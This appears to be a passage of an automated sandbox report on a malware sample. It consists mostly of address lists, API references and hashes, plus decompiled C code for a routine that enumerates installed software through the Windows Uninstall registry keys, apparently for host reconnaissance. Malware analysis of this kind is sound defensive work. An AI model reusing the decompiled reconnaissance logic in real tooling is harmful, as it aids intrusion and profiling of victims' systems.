                                                                                                                                                                        0x00405706
                                                                                                                                                                        0x00405b13
                                                                                                                                                                        0x00405b16
                                                                                                                                                                        0x00405b1f
                                                                                                                                                                        0x00405b26
                                                                                                                                                                        0x00405b4e
                                                                                                                                                                        0x00405b4e
                                                                                                                                                                        0x00405b54
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405b55
                                                                                                                                                                        0x00405711
                                                                                                                                                                        0x00405721
                                                                                                                                                                        0x00405b10
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405b10
                                                                                                                                                                        0x00405735
                                                                                                                                                                        0x00405740
                                                                                                                                                                        0x0040574e
                                                                                                                                                                        0x00405751
                                                                                                                                                                        0x00405756
                                                                                                                                                                        0x0040575a
                                                                                                                                                                        0x00405af0
                                                                                                                                                                        0x00405af3
                                                                                                                                                                        0x00405afc
                                                                                                                                                                        0x00405b05
                                                                                                                                                                        0x00405ae5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405ae5
                                                                                                                                                                        0x00405765
                                                                                                                                                                        0x00405775
                                                                                                                                                                        0x00405aed
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405aed
                                                                                                                                                                        0x00405789
                                                                                                                                                                        0x00405794
                                                                                                                                                                        0x004057a2
                                                                                                                                                                        0x004057a5
                                                                                                                                                                        0x004057aa
                                                                                                                                                                        0x004057ae
                                                                                                                                                                        0x00405abe
                                                                                                                                                                        0x00405ac1
                                                                                                                                                                        0x00405aca
                                                                                                                                                                        0x00405ad3
                                                                                                                                                                        0x00405adc
                                                                                                                                                                        0x00405ae5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405ae5
                                                                                                                                                                        0x004057b9
                                                                                                                                                                        0x004057c0
                                                                                                                                                                        0x004057c5
                                                                                                                                                                        0x004057cc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004057de
                                                                                                                                                                        0x004057e1
                                                                                                                                                                        0x004057f1
                                                                                                                                                                        0x00405800
                                                                                                                                                                        0x00405805
                                                                                                                                                                        0x00405809
                                                                                                                                                                        0x00405a82
                                                                                                                                                                        0x00405a85
                                                                                                                                                                        0x00405a8e
                                                                                                                                                                        0x00405a97
                                                                                                                                                                        0x00405aa0
                                                                                                                                                                        0x00405aa9
                                                                                                                                                                        0x00405ab0
                                                                                                                                                                        0x00405b4e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405b4e
                                                                                                                                                                        0x00405814
                                                                                                                                                                        0x00405824
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405831
                                                                                                                                                                        0x0040583a
                                                                                                                                                                        0x00405847
                                                                                                                                                                        0x0040584a
                                                                                                                                                                        0x0040584c
                                                                                                                                                                        0x0040584e
                                                                                                                                                                        0x0040585a
                                                                                                                                                                        0x0040585c
                                                                                                                                                                        0x0040585d
                                                                                                                                                                        0x00405864
                                                                                                                                                                        0x00405a3d
                                                                                                                                                                        0x00405a40
                                                                                                                                                                        0x00405a49
                                                                                                                                                                        0x00405a52
                                                                                                                                                                        0x00405a5b
                                                                                                                                                                        0x00405a64
                                                                                                                                                                        0x00405a6d
                                                                                                                                                                        0x00405a76
                                                                                                                                                                        0x00405b4e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405b4e
                                                                                                                                                                        0x0040587f
                                                                                                                                                                        0x00405a3a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405a3a
                                                                                                                                                                        0x0040588a
                                                                                                                                                                        0x00405894
                                                                                                                                                                        0x0040589f
                                                                                                                                                                        0x004058a1
                                                                                                                                                                        0x004058a4
                                                                                                                                                                        0x004058a9
                                                                                                                                                                        0x004058aa
                                                                                                                                                                        0x004058ad
                                                                                                                                                                        0x004058b7
                                                                                                                                                                        0x004058c4
                                                                                                                                                                        0x004058c8
                                                                                                                                                                        0x004058c9
                                                                                                                                                                        0x004058cc
                                                                                                                                                                        0x004058cf
                                                                                                                                                                        0x004058d2
                                                                                                                                                                        0x004058d7
                                                                                                                                                                        0x004058de
                                                                                                                                                                        0x004058ef
                                                                                                                                                                        0x004058ff
                                                                                                                                                                        0x00405903
                                                                                                                                                                        0x00405908
                                                                                                                                                                        0x0040591a
                                                                                                                                                                        0x0040591d
                                                                                                                                                                        0x0040591f
                                                                                                                                                                        0x00405926
                                                                                                                                                                        0x0040592b
                                                                                                                                                                        0x00405931
                                                                                                                                                                        0x00405935
                                                                                                                                                                        0x0040593b
                                                                                                                                                                        0x0040593e
                                                                                                                                                                        0x00405950
                                                                                                                                                                        0x0040595b
                                                                                                                                                                        0x0040596c
                                                                                                                                                                        0x00405970
                                                                                                                                                                        0x00405987
                                                                                                                                                                        0x0040598b
                                                                                                                                                                        0x004059a3
                                                                                                                                                                        0x004059a8
                                                                                                                                                                        0x004059a8
                                                                                                                                                                        0x0040598b
                                                                                                                                                                        0x004059ac
                                                                                                                                                                        0x004059b5
                                                                                                                                                                        0x004059be
                                                                                                                                                                        0x004059c5
                                                                                                                                                                        0x004059cb
                                                                                                                                                                        0x004059cb
                                                                                                                                                                        0x004059cf
                                                                                                                                                                        0x004059d8
                                                                                                                                                                        0x004059e1
                                                                                                                                                                        0x004059ea
                                                                                                                                                                        0x004059f3
                                                                                                                                                                        0x004059fc
                                                                                                                                                                        0x00405a05
                                                                                                                                                                        0x00405a0e
                                                                                                                                                                        0x00405a17
                                                                                                                                                                        0x00405a2b
                                                                                                                                                                        0x00405a2f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405a35
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405a35
                                                                                                                                                                        0x00405a2f
                                                                                                                                                                        0x00405b4e
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 004055F0
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B4E
                                                                                                                                                                          • Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
                                                                                                                                                                          • Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00405644
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00405698
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 004056EC
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00405740
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00405794
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 004057F1
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040584C
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00028000), ref: 00405894
                                                                                                                                                                          • Part of subcall function 00405FEB: lstrlenW.KERNEL32(006D5B38,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 00406137
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004059AC
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004059B5
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004059BE
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004059C5
                                                                                                                                                                          • Part of subcall function 00407EDB: LocalAlloc.KERNEL32(00000040,0000C350,?,00000000,00000001,?,?,?,?,?,00409B89,00000001,?,00000000,00000000,?), ref: 00407EF5
                                                                                                                                                                          • Part of subcall function 00407EDB: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00407F9B
                                                                                                                                                                        • LocalFree.KERNELBASE(00000000), ref: 004059CF
                                                                                                                                                                        • LocalFree.KERNEL32(00407BAF), ref: 004059D8
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004059E1
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004059EA
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004059F3
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004059FC
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00405A05
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00405A0E
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00405A17
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                          • Part of subcall function 00408619: LocalAlloc.KERNEL32(00000040,0000FF78,00000000,00407870), ref: 00408628
                                                                                                                                                                        • LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A40
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A49
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A52
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A5B
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A64
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A6D
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A76
                                                                                                                                                                        • LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A85
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A8E
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A97
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AA0
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AA9
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AB0
                                                                                                                                                                        • LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AC1
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405ACA
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AD3
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405ADC
                                                                                                                                                                        • LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AE5
                                                                                                                                                                        • LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AF3
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AFC
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B05
                                                                                                                                                                        • LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B16
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B1F
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B26
                                                                                                                                                                        • LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B37
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$Alloc$lstrlen$Global
                                                                                                                                                                        • String ID: x[m
                                                                                                                                                                        • API String ID: 2107727554-3488577920
                                                                                                                                                                        • Opcode ID: 1c60b24231b25f616e40e6fb9721cc66f7a2b7ed1654eea12d62df99302760ad
                                                                                                                                                                        • Instruction ID: f35946c0f576b0545b5d2f7ca60a1d17271964e093f6211ee75f8335e655f3b5
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c60b24231b25f616e40e6fb9721cc66f7a2b7ed1654eea12d62df99302760ad
                                                                                                                                                                        • Instruction Fuzzy Hash: E1F1C372900225EFDB149BA6DE48EAEBB75EB48310F044535F905B32A0DB746D21CFA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 662 409581-4095c1 call 40a503 RegOpenKeyExW 665 4095d3-4095d8 662->665 666 4095c3-4095ce RegCloseKey 662->666 668 4095d9-40960d RegEnumKeyExW 665->668 667 409900-409903 666->667 670 409613-40962e RegOpenKeyExW 668->670 671 409737-409738 LocalFree 668->671 673 409630-409640 LocalFree RegCloseKey 670->673 674 409645-40968f RegQueryValueExW 670->674 672 40973e-409745 671->672 672->668 675 40974b-409774 RegCloseKey RegOpenKeyExW 672->675 673->672 681 409695-4096c8 RegQueryValueExW 674->681 682 40971b-409734 LocalFree * 2 RegCloseKey 674->682 677 4098f4-4098ff RegCloseKey 675->677 678 40977a-40977c 675->678 677->667 679 40977f-4097b3 RegEnumKeyExW 678->679 684 4097b9-4097d4 RegOpenKeyExW 679->684 685 4098dd-4098de LocalFree 679->685 691 4096ca-4096d7 681->691 692 4096de 681->692 682->671 688 4097d6-4097e6 LocalFree RegCloseKey 684->688 689 4097eb-409835 RegQueryValueExW 684->689 686 4098e4-4098eb 685->686 686->679 690 4098f1-4098f3 686->690 688->686 699 4098c1-4098da LocalFree * 2 RegCloseKey 689->699 700 40983b-40986e RegQueryValueExW 689->700 690->677 691->692 697 4096d9-4096dc 691->697 693 4096df-4096fe wsprintfW 692->693 701 409700-40970f call 40a503 693->701 702 409711-409718 LocalFree 693->702 697->693 699->685 706 409870-40987d 700->706 707 409884 700->707 701->702 702->682 706->707 710 40987f-409882 706->710 708 409885-4098a4 wsprintfW 707->708 712 4098a6-4098ad call 40a503 708->712 713 4098b7-4098be LocalFree 708->713 710->708 715 4098b2-4098b5 712->715 713->699 715->713
                                                                                                                                                                        C-Code - Quality: 52%
                                                                                                                                                                        			E00409581(void* __eflags, intOrPtr* _a4, void* _a8) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				char* _v12;
                                                                                                                                                                        				int _v16;
                                                                                                                                                                        				int _v20;
                                                                                                                                                                        				int _v24;
                                                                                                                                                                        				int _v28;
                                                                                                                                                                        				int _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				int _v40;
                                                                                                                                                                        				long _t81;
                                                                                                                                                                        				long _t85;
                                                                                                                                                                        				long _t89;
                                                                                                                                                                        				long _t95;
                                                                                                                                                                        				long _t98;
                                                                                                                                                                        				long _t105;
                                                                                                                                                                        				long _t115;
                                                                                                                                                                        				intOrPtr _t121;
                                                                                                                                                                        				long _t127;
                                                                                                                                                                        				long _t134;
                                                                                                                                                                        				long _t144;
                                                                                                                                                                        				intOrPtr* _t157;
                                                                                                                                                                        				int _t158;
                                                                                                                                                                        				int _t159;
                                                                                                                                                                        				void* _t160;
                                                                                                                                                                        				void* _t161;
                                                                                                                                                                        				void* _t191;
                                                                                                                                                                        				void* _t193;
                                                                                                                                                                        				void* _t194;
                                                                                                                                                                        				void* _t195;
                                                                                                                                                                        				int* _t196;
                                                                                                                                                                        				void* _t198;
                                                                                                                                                                        
                                                                                                                                                                        				_t157 = _a4;
                                                                                                                                                                        				_t196 = 0;
                                                                                                                                                                        				_v16 = 0xf003f;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				 *_t157 = E0040A503( *_t157, _a8);
                                                                                                                                                                        				_t81 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20119,  &_v8); // executed
                                                                                                                                                                        				if(_t81 == 0) {
                                                                                                                                                                        					_t158 = 0;
                                                                                                                                                                        					_v28 = 0;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_v32 = 0x800;
                                                                                                                                                                        						_t191 =  *((intOrPtr*)( *0x40e044))(0x40, 0x1000);
                                                                                                                                                                        						_v36 = _t191;
                                                                                                                                                                        						_t85 = RegEnumKeyExW(_v8, _t158, _t191,  &_v32, _t196, _t196, _t196, _t196); // executed
                                                                                                                                                                        						_v40 = _t85;
                                                                                                                                                                        						if(_t85 != 0) {
                                                                                                                                                                        							L15:
                                                                                                                                                                        							LocalFree(_t191);
                                                                                                                                                                        							goto L16;
                                                                                                                                                                        						}
                                                                                                                                                                        						_a8 = _t196;
                                                                                                                                                                        						_t127 = RegOpenKeyExW(_v8, _t191, _t196, 0x20119,  &_a8); // executed
                                                                                                                                                                        						if(_t127 == 0) {
                                                                                                                                                                        							_v24 = 0x1000;
                                                                                                                                                                        							_v20 = 0x1000;
                                                                                                                                                                        							_t161 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
                                                                                                                                                                        							_v12 =  *((intOrPtr*)( *0x40e044))(0x40, _v20 + _v20);
                                                                                                                                                                        							_t134 = RegQueryValueExW(_a8, L"DisplayName", _t196,  &_v16, _t161,  &_v24); // executed
                                                                                                                                                                        							if(_t134 != 0) {
                                                                                                                                                                        								L14:
                                                                                                                                                                        								LocalFree(_v12);
                                                                                                                                                                        								LocalFree(_t161);
                                                                                                                                                                        								RegCloseKey(_a8); // executed
                                                                                                                                                                        								_t158 = _v28;
                                                                                                                                                                        								goto L15;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t195 =  *((intOrPtr*)( *0x40e044))(0x40, _v20 + _v24 + _v20 + _v24);
                                                                                                                                                                        							_t144 = RegQueryValueExW(_a8, L"DisplayVersion", _t196,  &_v16, _v12,  &_v20); // executed
                                                                                                                                                                        							if(_t144 != 0) {
                                                                                                                                                                        								L10:
                                                                                                                                                                        								_push(_t196);
                                                                                                                                                                        								L11:
                                                                                                                                                                        								_push(_t161);
                                                                                                                                                                        								wsprintfW(_t195, L"\t%s %s\n");
                                                                                                                                                                        								_t198 = _t198 + 0x10;
                                                                                                                                                                        								_push(_t195);
                                                                                                                                                                        								_push( *_a4);
                                                                                                                                                                        								if( *((intOrPtr*)( *0x40e18c))() == 0) {
                                                                                                                                                                        									 *_a4 = E0040A503( *_a4, _t195);
                                                                                                                                                                        								}
                                                                                                                                                                        								LocalFree(_t195);
                                                                                                                                                                        								_t191 = _v36;
                                                                                                                                                                        								goto L14;
                                                                                                                                                                        							}
                                                                                                                                                                        							_push(_v12);
                                                                                                                                                                        							_push(_t161);
                                                                                                                                                                        							if( *((intOrPtr*)( *0x40e18c))() != 0) {
                                                                                                                                                                        								goto L10;
                                                                                                                                                                        							}
                                                                                                                                                                        							_push(_v12);
                                                                                                                                                                        							goto L11;
                                                                                                                                                                        						}
                                                                                                                                                                        						LocalFree(_t191);
                                                                                                                                                                        						RegCloseKey(_a8);
                                                                                                                                                                        						L16:
                                                                                                                                                                        						_t158 = _t158 + 1;
                                                                                                                                                                        						_v28 = _t158;
                                                                                                                                                                        					} while (_v40 == _t196);
                                                                                                                                                                        					RegCloseKey(_v8);
                                                                                                                                                                        					_v8 = _t196;
                                                                                                                                                                        					_t89 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", _t196, 0x20019,  &_v8); // executed
                                                                                                                                                                        					if(_t89 != 0) {
                                                                                                                                                                        						L34:
                                                                                                                                                                        						RegCloseKey(_v8);
                                                                                                                                                                        						return _t196;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t159 = _t196;
                                                                                                                                                                        					_v24 = _t196;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_v40 = 0x800;
                                                                                                                                                                        						_t193 =  *((intOrPtr*)( *0x40e044))(0x40, 0x1000);
                                                                                                                                                                        						_v36 = _t193;
                                                                                                                                                                        						_t95 = RegEnumKeyExW(_v8, _t159, _t193,  &_v40, _t196, _t196, _t196, _t196); // executed
                                                                                                                                                                        						_v32 = _t95;
                                                                                                                                                                        						if(_t95 != 0) {
                                                                                                                                                                        							L31:
                                                                                                                                                                        							LocalFree(_t193);
                                                                                                                                                                        							goto L32;
                                                                                                                                                                        						}
                                                                                                                                                                        						_a8 = _t196;
                                                                                                                                                                        						_t98 = RegOpenKeyExW(_v8, _t193, _t196, 0x20019,  &_a8); // executed
                                                                                                                                                                        						if(_t98 == 0) {
                                                                                                                                                                        							_v28 = 0x1000;
                                                                                                                                                                        							_v20 = 0x1000;
                                                                                                                                                                        							_t160 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
                                                                                                                                                                        							_v12 =  *((intOrPtr*)( *0x40e044))(0x40, _v20 + _v20);
                                                                                                                                                                        							_t105 = RegQueryValueExW(_a8, L"DisplayName", _t196,  &_v16, _t160,  &_v28); // executed
                                                                                                                                                                        							if(_t105 != 0) {
                                                                                                                                                                        								L30:
                                                                                                                                                                        								LocalFree(_v12);
                                                                                                                                                                        								LocalFree(_t160);
                                                                                                                                                                        								RegCloseKey(_a8); // executed
                                                                                                                                                                        								_t159 = _v24;
                                                                                                                                                                        								goto L31;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t194 =  *((intOrPtr*)( *0x40e044))(0x40, _v20 + _v28 + _v20 + _v28);
                                                                                                                                                                        							_t115 = RegQueryValueExW(_a8, L"DisplayVersion", _t196,  &_v16, _v12,  &_v20); // executed
                                                                                                                                                                        							if(_t115 != 0) {
                                                                                                                                                                        								L26:
                                                                                                                                                                        								_push(_t196);
                                                                                                                                                                        								L27:
                                                                                                                                                                        								_push(_t160);
                                                                                                                                                                        								wsprintfW(_t194, L"\t%s %s\n");
                                                                                                                                                                        								_t198 = _t198 + 0x10;
                                                                                                                                                                        								_push(_t194);
                                                                                                                                                                        								_push( *_a4);
                                                                                                                                                                        								if( *((intOrPtr*)( *0x40e18c))() == 0) {
                                                                                                                                                                        									_t121 = E0040A503( *_a4, _t194); // executed
                                                                                                                                                                        									 *_a4 = _t121;
                                                                                                                                                                        								}
                                                                                                                                                                        								LocalFree(_t194);
                                                                                                                                                                        								_t193 = _v36;
                                                                                                                                                                        								goto L30;
                                                                                                                                                                        							}
                                                                                                                                                                        							_push(_v12);
                                                                                                                                                                        							_push(_t160);
                                                                                                                                                                        							if( *((intOrPtr*)( *0x40e18c))() != 0) {
                                                                                                                                                                        								goto L26;
                                                                                                                                                                        							}
                                                                                                                                                                        							_push(_v12);
                                                                                                                                                                        							goto L27;
                                                                                                                                                                        						}
                                                                                                                                                                        						LocalFree(_t193);
                                                                                                                                                                        						RegCloseKey(_a8);
                                                                                                                                                                        						L32:
                                                                                                                                                                        						_t159 = _t159 + 1;
                                                                                                                                                                        						_v24 = _t159;
                                                                                                                                                                        					} while (_v32 == _t196);
                                                                                                                                                                        					_t196 = 1;
                                                                                                                                                                        					goto L34;
                                                                                                                                                                        				}
                                                                                                                                                                        				RegCloseKey(_v8);
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}


































                                                                                                                                                                        0x0040958b
                                                                                                                                                                        0x0040958f
                                                                                                                                                                        0x00409591
                                                                                                                                                                        0x00409598
                                                                                                                                                                        0x004095a5
                                                                                                                                                                        0x004095bd
                                                                                                                                                                        0x004095c1
                                                                                                                                                                        0x004095d3
                                                                                                                                                                        0x004095d5
                                                                                                                                                                        0x004095d9
                                                                                                                                                                        0x004095e5
                                                                                                                                                                        0x004095f4
                                                                                                                                                                        0x004095fd
                                                                                                                                                                        0x00409606
                                                                                                                                                                        0x00409608
                                                                                                                                                                        0x0040960d
                                                                                                                                                                        0x00409737
                                                                                                                                                                        0x00409738
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409738
                                                                                                                                                                        0x00409627
                                                                                                                                                                        0x0040962a
                                                                                                                                                                        0x0040962e
                                                                                                                                                                        0x0040964f
                                                                                                                                                                        0x00409652
                                                                                                                                                                        0x00409661
                                                                                                                                                                        0x00409676
                                                                                                                                                                        0x0040968b
                                                                                                                                                                        0x0040968f
                                                                                                                                                                        0x0040971b
                                                                                                                                                                        0x0040971e
                                                                                                                                                                        0x00409725
                                                                                                                                                                        0x0040972e
                                                                                                                                                                        0x00409734
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409734
                                                                                                                                                                        0x004096ae
                                                                                                                                                                        0x004096c4
                                                                                                                                                                        0x004096c8
                                                                                                                                                                        0x004096de
                                                                                                                                                                        0x004096de
                                                                                                                                                                        0x004096df
                                                                                                                                                                        0x004096df
                                                                                                                                                                        0x004096e6
                                                                                                                                                                        0x004096ef
                                                                                                                                                                        0x004096f7
                                                                                                                                                                        0x004096f8
                                                                                                                                                                        0x004096fe
                                                                                                                                                                        0x0040970f
                                                                                                                                                                        0x0040970f
                                                                                                                                                                        0x00409712
                                                                                                                                                                        0x00409718
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409718
                                                                                                                                                                        0x004096ca
                                                                                                                                                                        0x004096d2
                                                                                                                                                                        0x004096d7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004096d9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004096d9
                                                                                                                                                                        0x00409631
                                                                                                                                                                        0x0040963a
                                                                                                                                                                        0x0040973e
                                                                                                                                                                        0x0040973e
                                                                                                                                                                        0x0040973f
                                                                                                                                                                        0x00409742
                                                                                                                                                                        0x0040974e
                                                                                                                                                                        0x0040976d
                                                                                                                                                                        0x00409770
                                                                                                                                                                        0x00409774
                                                                                                                                                                        0x004098f4
                                                                                                                                                                        0x004098f7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004098ff
                                                                                                                                                                        0x0040977a
                                                                                                                                                                        0x0040977c
                                                                                                                                                                        0x0040977f
                                                                                                                                                                        0x0040978b
                                                                                                                                                                        0x0040979a
                                                                                                                                                                        0x004097a3
                                                                                                                                                                        0x004097ac
                                                                                                                                                                        0x004097ae
                                                                                                                                                                        0x004097b3
                                                                                                                                                                        0x004098dd
                                                                                                                                                                        0x004098de
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004098de
                                                                                                                                                                        0x004097cd
                                                                                                                                                                        0x004097d0
                                                                                                                                                                        0x004097d4
                                                                                                                                                                        0x004097f5
                                                                                                                                                                        0x004097f8
                                                                                                                                                                        0x00409807
                                                                                                                                                                        0x0040981c
                                                                                                                                                                        0x00409831
                                                                                                                                                                        0x00409835
                                                                                                                                                                        0x004098c1
                                                                                                                                                                        0x004098c4
                                                                                                                                                                        0x004098cb
                                                                                                                                                                        0x004098d4
                                                                                                                                                                        0x004098da
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004098da
                                                                                                                                                                        0x00409854
                                                                                                                                                                        0x0040986a
                                                                                                                                                                        0x0040986e
                                                                                                                                                                        0x00409884
                                                                                                                                                                        0x00409884
                                                                                                                                                                        0x00409885
                                                                                                                                                                        0x00409885
                                                                                                                                                                        0x0040988c
                                                                                                                                                                        0x00409895
                                                                                                                                                                        0x0040989d
                                                                                                                                                                        0x0040989e
                                                                                                                                                                        0x004098a4
                                                                                                                                                                        0x004098ad
                                                                                                                                                                        0x004098b5
                                                                                                                                                                        0x004098b5
                                                                                                                                                                        0x004098b8
                                                                                                                                                                        0x004098be
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004098be
                                                                                                                                                                        0x00409870
                                                                                                                                                                        0x00409878
                                                                                                                                                                        0x0040987d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040987f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040987f
                                                                                                                                                                        0x004097d7
                                                                                                                                                                        0x004097e0
                                                                                                                                                                        0x004098e4
                                                                                                                                                                        0x004098e4
                                                                                                                                                                        0x004098e5
                                                                                                                                                                        0x004098e8
                                                                                                                                                                        0x004098f3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004098f3
                                                                                                                                                                        0x004095c6
                                                                                                                                                                        0x00000000

